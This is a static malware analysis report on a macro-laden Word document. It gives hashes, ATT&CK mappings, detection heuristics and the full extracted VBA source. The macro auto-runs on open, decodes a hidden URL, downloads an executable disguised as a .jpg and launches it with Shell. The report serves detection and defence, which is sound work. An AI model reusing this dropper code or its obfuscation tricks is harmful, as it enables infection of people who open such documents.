Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 1cfa0038c28635b3…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 41.1 KB
Created: 2015-07-13 21:31:00 UTC
Authoring application: Microsoft Office Word 12.0000
First seen: 2015-10-01
MD5: d184c9617caa935ac5f9d020de568210
SHA-1: fd74098d4aab752379a9c6dceae966c6b82deaf9
SHA-256: 1cfa0038c28635b39c1d6965e2f54c06bb706d3afa1221567ce0f309bfc51c7e
Risk Score: 270

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1105 Ingress Tool Transfer

The sample contains a VBA macro that executes when the document is opened. The Document_Open subroutine downloads a file from a hardcoded URL (stored as a hex string and decoded at runtime by fConvertHexToString so that the plain URL does not appear in the macro source) and saves it to 'C:\ProgramData\' under a randomly generated numeric filename with a .jpg extension. The macro then attempts to execute the downloaded file via Shell. This is a clear download-and-execute pattern for a second-stage payload.

Heuristics (8)

  • VBA project inside OOXML [medium] (5 related findings) OOXML_VBA
    Document contains a VBA project: VBA macros present
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script:
        RetVal = Shell(SavePath$, 1)
  • VBA downloads and writes a file to disk [critical] OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper, even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script:
        ADOStream.Write XMLHTTP.responseBody
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script:
        Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro [low] OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()
  • External relationship [high] OOXML_EXTERNAL_REL
    External target in word/_rels/settings.xml.rels: file:///C:\Users\Дмитрий\AppData\Roaming\Microsoft\Шаблоны\Счет.dotx
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
    • http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2748 bytes
SHA-256: 9539d35ad510d29b982ebdba65f5f5248ee8b8d06c7107f007e5692e7efcfd6e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1TemplateProject.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Converts a hex string to characters; used below to hide the download URL from keyword scanning
Public Function fConvertHexToString(strHexString As String) As String
    Dim intLenOfString As Integer
    Dim intCounter As Integer
    Dim strBuild As String

    'Hex String must have a valid length, and it must be an even length
    If Len(strHexString) = 0 Or Len(strHexString) Mod 2 <> 0 Then Exit Function

    intLenOfString = Len(strHexString)

    For intCounter = 1 To Len(strHexString)
      If intCounter Mod 2 <> 0 Then     'need Hex pairs
        'Retrieve the Value of the Hex Pair, then Convert to a Character,
        'then Append to a Base String
        strBuild = strBuild & Chr$(Val("&H" & Mid$(strHexString, intCounter, 2)))
      End If
    Next
End Function

' Junk (padding code never called)
Function Trashcodeb(Value$) As String
    If S2 >= S3 Then
    MsgBox "Hello World!"
    End If
    Dim A, B As Integer
    A = dasvxcb
    B = sfgffsdfgd

End Function
' Junk 2
Function Trashcosfbasd(Value$) As String
    If S3 >= S4 Then
    MsgBox "23esfsgadfsfg!"
    End If
    Dim C, B As Integer
    Z = hrtdhfg
    d = hteASdfgetrfd

End Function

' Auto-executes when the document is opened
Private Sub Document_Open()

    Dim LRandomNumber As Integer

    Randomize
    FileName$ = Int((99999999 - 200 + 1) * Rnd + 300000)
    LinkToFile$ = fConvertHexToString("687474703a2f2f7777772e7461736b6d616e616765726669782e636f6d2f646c2f5461736b4d616e616765724669782e657865")

    SavePath$ = "C:\ProgramData\" + FileName$ + ".jpg"

    ' download the file from the internet
    adfgehtrf LinkToFile$, SavePath$

    ' open the downloaded file
    RetVal = Shell(SavePath$, 1)

End Sub
Function adfgehtrf(ByVal URL$, ByVal LocalPath$) As Boolean
    ' Downloads the file at URL$
    ' and saves it under the name LocalPath$
    Dim XMLHTTP, ADOStream, FileName
    On Error Resume Next: Kill LocalPath$

    Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
    XMLHTTP.Open "GET", Replace(URL$, "\", "/"), "False"
    XMLHTTP.send

    Set ADOStream = CreateObject("ADODB.Stream")
    ADOStream.Type = 1: ADOStream.Open
    ADOStream.Write XMLHTTP.responseBody

    ADOStream.SaveToFile LocalPath$, 2
    ADOStream.Close: Set ADOStream = Nothing
    DownloadFile = True

    Set XMLHTTP = Nothing
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 23040 bytes
SHA-256: 9fd1e6d376fa63e2440caad4be19003e5b48780bd69cc9add8daf0d15ca4d808